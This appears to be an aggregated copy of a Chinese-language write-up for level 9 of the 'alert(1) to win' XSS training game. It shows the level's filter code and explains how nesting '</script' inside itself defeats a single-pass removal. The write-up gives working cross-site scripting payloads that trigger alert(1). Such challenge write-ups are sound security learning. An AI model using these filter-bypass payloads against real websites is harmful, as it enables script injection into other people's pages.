1
【alert(1) to win】 Level 09 - JSON 2
source link: https://exp-blog.com/safe/ctf/alert/level-09-json-2/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
【alert(1) to win】 Level 09
javascript
function escape(s) {
s = JSON.stringify(s).replace(/<\/script/gi, '');
return '<script>console.log(' + s + ');</script>';
}Level 03 - JSON 的进阶版。
回顾下第 3 题的 payload 是 :
javascript
</script><script>alert(1);//而这题对输入的字符串会做 一次 全局替换,把 </script 删掉,使得我们无法闭合标签。
但是因为替换只做一次,所以要绕过也不难,只需要把 </script 做一次嵌套即可,例如 </scr</scriptipt>,被全局替换后,留下的就是我们需要的闭合标签 </script> 。
因此这题可构造这样的 payload :
javascript
</scr</scriptipt><script>alert(1);//
- payload.js : 下载
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK